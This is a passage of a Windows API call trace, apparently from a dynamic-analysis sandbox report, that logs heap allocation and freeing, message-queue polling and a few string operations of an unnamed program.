hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.599] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.599] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab400 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3e8 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab370 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3d0 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3b8 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab388 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0157.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3a0 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3e8 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3d0 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3b8 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab400 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.600] lstrlenW (lpString="32") returned 2 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab388 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3a0 | out: hHeap=0x25c0000) returned 1 [0157.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2048 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.601] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.601] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3a0 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab388 [0157.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab400 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3b8 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3d0 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3e8 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2098 [0157.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab370 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab400 | out: hHeap=0x25c0000) returned 1 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab388 | out: hHeap=0x25c0000) returned 1 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3b8 | out: hHeap=0x25c0000) returned 1 [0157.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3d0 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3a0 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.603] lstrlenW (lpString="20") returned 2 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3e8 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0157.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.603] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0157.603] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0157.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0157.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1a8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1d8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4730 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0e8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab160 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4758 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b47a8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4780 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0d0 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0157.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab250 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab208 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2028 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab100 | out: hHeap=0x25c0000) returned 1 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab100 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4618 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.605] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f28 [0157.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4618 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0157.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2008 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4780 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2028 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b47a8 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fd8 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab208 | out: hHeap=0x25c0000) returned 1 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4618 | out: hHeap=0x25c0000) returned 1 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0157.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0157.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0157.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab208 | out: hHeap=0x25c0000) returned 1 [0157.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f28 [0157.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0157.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0157.608] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4668 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafb0 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaed8 | out: hHeap=0x25c0000) returned 1 [0157.608] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0157.608] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0157.608] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0157.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0157.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0157.608] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0157.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0157.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaed8 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0157.609] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafb0 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f28 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0157.609] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafb0 | out: hHeap=0x25c0000) returned 1 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0157.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0157.609] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0157.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0157.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafb0 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4668 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f28 [0157.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 